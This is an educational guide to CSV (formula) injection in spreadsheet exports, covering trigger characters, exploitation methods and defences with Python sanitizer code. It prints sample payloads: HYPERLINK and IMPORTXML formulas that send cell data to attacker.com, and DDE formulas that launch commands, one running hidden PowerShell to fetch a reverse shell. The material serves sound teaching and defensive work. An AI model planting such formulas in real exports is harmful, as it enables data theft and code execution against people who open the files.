What is CSV Injection (Formula Injection)? Ways to Exploit, Examples and Impact

Comprehensive guide to CSV Injection (Formula Injection). Learn how attackers exploit spreadsheets and how to prevent these attacks in your applications.

CSV Injection, also known as Formula Injection, is a security vulnerability that occurs when a web application writes untrusted user input into a CSV (Comma-Separated Values) file without neutralizing it. Although CSV files are often viewed as simple, harmless text files, spreadsheet applications such as Microsoft Excel, Google Sheets, and LibreOffice Calc treat cells starting with specific characters as formulas to evaluate. Attackers can weaponize this behavior to execute arbitrary commands, exfiltrate sensitive data, or launch phishing attacks against unsuspecting users who open the exported file.

Understanding the Basics of CSV Injection

At its core, CSV Injection is not a vulnerability in the spreadsheet software itself, but rather a failure of the web application to treat user-provided data as literal text. Spreadsheet programs are designed to be powerful; they include features that allow cells to perform calculations, fetch data from external URLs, or even interact with the underlying operating system.

When a spreadsheet application encounters a cell starting with one of the following four characters, it interprets the content as a formula:

  • Equals sign (=)
  • Plus sign (+)
  • Minus sign (-)
  • At symbol (@)

Suppose an attacker can store a string starting with one of these characters in the application's database, for example through a profile name, a comment field, or an order description. When that data is later exported into a CSV report for an administrator or another user, the spreadsheet software evaluates the payload as a formula as soon as the file is opened. Some payloads act immediately, while others require the victim to click a link or accept a security prompt.
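The flow described above can be sketched in a few lines of Python. This is a minimal illustration, not code from any particular application: the function name export_rows and the sample rows are hypothetical. It shows that a standard CSV writer handles delimiters and quoting but passes a leading = through unchanged.

```python
import csv
import io

def export_rows(rows):
    """Write rows to CSV text with no formula neutralization (vulnerable)."""
    buffer = io.StringIO()
    writer = csv.writer(buffer)
    writer.writerows(rows)
    return buffer.getvalue()

# Hypothetical stored data: the "name" in the second row came from an attacker.
rows = [
    ["name", "comment"],
    ["=1+1", "hello"],
]

csv_text = export_rows(rows)
# The payload reaches the file exactly as it was stored.
print(csv_text)
```

The csv module is doing its job correctly here; formula neutralization is simply outside its scope, so the application has to add it.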

Why is CSV Injection Dangerous?

Many organizations rely on CSV exports for auditing, financial reporting, and data analysis. Because users generally trust files coming from their own internal systems, they are likely to click through the security warnings that spreadsheet software might display. This trust makes CSV Injection a potent vector for social engineering and initial access into a corporate network.

Common Triggers and Spreadsheet Behavior

To understand how to exploit or prevent this vulnerability, we must look at how different characters trigger formula execution.

The Equals Sign (=)

This is the most common trigger. It tells the spreadsheet to evaluate the following expression. For example, =SUM(A1:A10) is a legitimate formula, but =1+1 is equally valid. An attacker might use =HYPERLINK("http://attacker.com", "Click for Info") to trick a user.

The Plus (+) and Minus (-) Signs

Spreadsheet engines often treat these as mathematical operators. If a cell contains +1+1, Excel will automatically convert it to =1+1 and display 2. Attackers use these as alternatives to the equals sign to bypass poorly implemented filters that only check for =.

The At Symbol (@)

In Lotus 1-2-3, functions were called with a leading @ symbol, and Excel adopted the same syntax for compatibility. Modern Excel still accepts it, meaning @SUM(A1:A10) will be treated as a formula.
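To make the filter-bypass point concrete, here is a small sketch that compares a check for = alone with a check for all four trigger characters. The function names and sample values are hypothetical and chosen only for illustration.

```python
# The four trigger characters discussed above.
TRIGGER_CHARS = ("=", "+", "-", "@")

def naive_is_formula(value: str) -> bool:
    """A poorly implemented filter: only looks for a leading equals sign."""
    return value.startswith("=")

def is_formula(value: str) -> bool:
    """Checks for any of the four trigger characters at the start of the cell."""
    return value.startswith(TRIGGER_CHARS)

samples = ["=1+1", "+1+1", "-1+1", "@SUM(A1:A10)", "plain text"]
for sample in samples:
    print(f"{sample!r}: naive={naive_is_formula(sample)}, full={is_formula(sample)}")
```

The naive check flags only the first sample, while the other three formula-like values slip past it.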

Ways to Exploit CSV Injection

There are three primary ways an attacker can leverage CSV Injection: Data Exfiltration, Social Engineering (Phishing), and Remote Code Execution (RCE).

1. Data Exfiltration via Hyperlinks

This is the most common and reliable form of CSV Injection. The goal is to steal data from other cells within the spreadsheet and send it to an attacker-controlled server.

Payload Example:

=HYPERLINK("http://attacker.com/logger?leak=" & A2 & "_" & B2, "Error: Click to Fix")

In this scenario, if the CSV contains sensitive information in cells A2 (e.g., a username) and B2 (e.g., a password or PII), the formula concatenates them and appends them to a URL. When the victim clicks the link, the sensitive data is sent directly to the attacker's web logs.
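The concatenation performed by the formula can be simulated outside the spreadsheet. The sketch below mirrors the & operator with Python string concatenation and then parses the result the way an attacker might read it from a web log. The cell values "alice" and "s3cret" are made up, and the simulation assumes values without characters that would need URL encoding.

```python
from urllib.parse import parse_qs, urlsplit

def simulate_hyperlink_target(a2: str, b2: str) -> str:
    """Mirror the spreadsheet expression: "...?leak=" & A2 & "_" & B2."""
    return "http://attacker.com/logger?leak=" + a2 + "_" + b2

# Hypothetical contents of cells A2 and B2 in the victim's export.
url = simulate_hyperlink_target("alice", "s3cret")

# What the attacker could recover from the request's query string.
leaked = parse_qs(urlsplit(url).query)["leak"][0]

print(url)
print(leaked)
```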

2. Remote Code Execution (RCE) via DDE

Dynamic Data Exchange (DDE) is a legacy Microsoft protocol that allows applications to share data. While Microsoft has introduced several security patches to limit DDE, it can still be exploited in certain environments or older versions of Excel to launch system commands.

Payload Example (Launching Calculator):

=cmd|' /C calc'!A0

In a real attack, the payload wouldn't just launch calc.exe. It would likely be a PowerShell command designed to download and execute a reverse shell:

=cmd|' /c powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand <Base64_Payload>'!A0

When the user opens the file, Excel will prompt them with two warnings: one about updating links and another about starting a system application. If the user clicks "Yes" to both, the command runs with that user's privileges, giving the attacker a foothold on the machine.
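On the defensive side, DDE-style payloads have a recognizable shape: a trigger character, an application name, a pipe, a topic, an exclamation mark, and an item. The following heuristic is a rough sketch for flagging such values in stored or exported data. The pattern and the function name looks_like_dde are assumptions made for illustration, and a regular expression like this should not be relied on as the only control.

```python
import re

# Heuristic shape: <trigger><application>|<topic>!<item>
# Example from the article: =cmd|' /C calc'!A0
DDE_PATTERN = re.compile(r"^[=+\-@]\s*[A-Za-z0-9_.]+\|.*!\S+", re.DOTALL)

def looks_like_dde(value: str) -> bool:
    """Return True if the value resembles a DDE invocation."""
    return bool(DDE_PATTERN.match(value))

for candidate in ["=cmd|' /C calc'!A0", "=SUM(A1:A10)", "=Sheet1!A1", "hello"]:
    print(f"{candidate!r}: {looks_like_dde(candidate)}")
```

Ordinary formulas and sheet references lack the pipe after the leading name, so they are not flagged by this particular pattern.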

3. Google Sheets Exploitation (IMPORTXML)

Google Sheets handles formulas differently because the execution happens on Google's servers, not the local machine. However, functions like IMPORTXML or IMPORTFEED can be used to perform Out-of-Band (OOB) data exfiltration.

Payload Example:

=IMPORTXML(CONCAT("http://attacker.com/log?data=", CONCATENATE(A1:E1)), "//a")

This formula takes the data from cells A1 through E1, appends it to a URL, and makes a request to the attacker's server to "import" XML data. The attacker doesn't care about the XML; they only care about the data leaked in the URL parameters.
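A similar heuristic can flag formula-like values that call functions capable of making network requests. The list below is illustrative rather than exhaustive: IMPORTXML and IMPORTFEED come from the text above, and the remaining names are other Google Sheets and Excel functions that fetch or link to external resources. The helper name find_network_functions is hypothetical.

```python
import re
from typing import List

# Illustrative, non-exhaustive list of functions that reach external resources.
NETWORK_FUNCTIONS = (
    "IMPORTXML", "IMPORTFEED", "IMPORTHTML", "IMPORTDATA",
    "IMPORTRANGE", "HYPERLINK", "WEBSERVICE",
)
_FUNCTION_CALL = re.compile(
    r"\b(" + "|".join(NETWORK_FUNCTIONS) + r")\s*\(", re.IGNORECASE
)

def find_network_functions(value: str) -> List[str]:
    """List network-capable functions called in a formula-like cell value."""
    # Only cells that start with a trigger character are evaluated as formulas.
    if not value.startswith(("=", "+", "-", "@")):
        return []
    return [name.upper() for name in _FUNCTION_CALL.findall(value)]

payload = '=IMPORTXML(CONCAT("http://attacker.com/log?data=", CONCATENATE(A1:E1)), "//a")'
print(find_network_functions(payload))
```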

Real-World Impact and Severity

The impact of CSV Injection varies depending on the context of the application. In a multi-tenant SaaS platform, an attacker could register an account with a malicious payload as their "Company Name." When the platform administrator exports a monthly billing report, the attacker's payload executes on the administrator's workstation.

Because this can lead to full system compromise (via RCE) or large-scale data breaches (via exfiltration), many security researchers classify it as a High-severity finding. However, some bug bounty programs treat it as a Medium-severity issue because it requires significant user interaction (clicking through warnings).

How to Prevent CSV Injection

Preventing CSV Injection requires a shift in how developers handle data exports. Simply blacklisting the = character is insufficient, as attackers can use @, +, or - to trigger the same behavior.

The Best Practice: Prepending an Apostrophe

A widely recommended way to neutralize CSV Injection is to prepend a single quote (apostrophe) character (') to any cell that starts with a trigger character. The spreadsheet application then handles the cell content as literal text rather than as a formula. Depending on the application and on how the file is loaded, the apostrophe may be hidden or may appear as part of the cell's text; in either case the formula is not evaluated.

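Secure Export Logic (Python):

def sanitize_for_csv(input_string):
    """Return input_string with a leading apostrophe if it could be read as a formula."""
    # Characters that spreadsheet applications treat as the start of a formula.
    trigger_chars = ('=', '+', '-', '@')
    # str.startswith accepts a tuple and matches any of its members.
    if input_string.startswith(trigger_chars):
        return "'" + input_string
    return input_string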
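As a usage sketch, the sanitizer can be applied to every cell while the file is written. The version below redefines sanitize_for_csv so the example is self-contained, and it makes two additions that go beyond the logic above, both drawn from OWASP's CSV Injection guidance: tab and carriage return are treated as trigger characters, and every field is wrapped in double quotes. The function name export_rows_safely and the sample rows are hypothetical.

```python
import csv
import io

# The four characters from the article plus tab and carriage return,
# which OWASP's guidance also lists (an addition to the logic above).
TRIGGER_CHARS = ("=", "+", "-", "@", "\t", "\r")

def sanitize_for_csv(value):
    """Convert a cell to text and neutralize a leading trigger character."""
    text = "" if value is None else str(value)
    if text.startswith(TRIGGER_CHARS):
        return "'" + text
    return text

def export_rows_safely(rows):
    """Write rows to CSV text, sanitizing every cell at output time."""
    buffer = io.StringIO()
    # QUOTE_ALL wraps each field in double quotes and doubles embedded quotes.
    writer = csv.writer(buffer, quoting=csv.QUOTE_ALL)
    for row in rows:
        writer.writerow([sanitize_for_csv(cell) for cell in row])
    return buffer.getvalue()

print(export_rows_safely([["name", "comment"], ["=1+1", 'say "hi"']]))
```

One trade-off of this sketch is that negative numbers passed in as values are also converted to text with a leading apostrophe.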

Input Validation vs. Output Encoding

While you should always validate user input, CSV Injection is an output encoding problem. You cannot always block users from starting a field with a minus sign (e.g., a legitimate negative number or a dash in a username). Therefore, the sanitization must happen at the moment the CSV is generated, ensuring that the data is safely wrapped for the target format.
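The distinction can be illustrated with a record that is stored untouched and encoded only when it is exported. In this sketch, which uses a hypothetical encode_cell helper and made-up field names, genuine numeric values pass through unchanged because they cannot carry a formula, while strings that begin with a trigger character are escaped.

```python
def encode_cell(value):
    """Encode one value for CSV output without altering the stored data."""
    # Genuine numbers are safe as-is, so a negative balance stays numeric.
    if isinstance(value, (int, float)):
        return value
    text = str(value)
    if text.startswith(("=", "+", "-", "@")):
        return "'" + text
    return text

# Hypothetical stored record: a username with a leading dash and a negative number.
stored_record = {"username": "-dash-user", "balance": -42.5}

# Encoding happens only when the export is generated.
exported = {key: encode_cell(value) for key, value in stored_record.items()}

print(stored_record)
print(exported)
```

The stored record keeps the original username, so other output channels such as HTML pages or JSON APIs are not affected by the CSV-specific escaping.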

Additional Defensive Layers

  1. User Education: Warn users that CSV files can contain active content and that they should never click "Yes" on security prompts regarding DDE or external links unless they are certain of the file's origin.
  2. Content Security Policy (CSP): While CSP doesn't stop Excel from executing, it can help prevent web-based exfiltration if the "CSV" is actually being rendered in a browser-based spreadsheet viewer.
  3. Use Alternative Formats: If possible, offer data exports in JSON or XML formats, which do not have the same inherent formula execution risks as CSV/XLSX.
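For the third option, a JSON export might look like the sketch below. The function name export_as_json and the sample record are hypothetical. The value that would be a formula in a spreadsheet is carried as an ordinary string, although this only helps as long as the consumer does not load the data into a spreadsheet afterwards.

```python
import json

def export_as_json(records):
    """Serialize records as JSON text; values are data, not formulas."""
    return json.dumps(records, indent=2)

# Hypothetical record containing a value that would be a formula in a spreadsheet.
records = [{"name": "=1+1", "comment": "hello"}]

payload = export_as_json(records)
print(payload)
```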

Conclusion

CSV Injection is a subtle but dangerous vulnerability that bridges the gap between web application security and desktop software exploitation. By understanding how spreadsheet engines interpret special characters, attackers can turn a simple data export feature into a powerful weapon for data theft and system compromise. Developers must take responsibility for sanitizing exports, ensuring that user-provided data remains just that—data, not code.
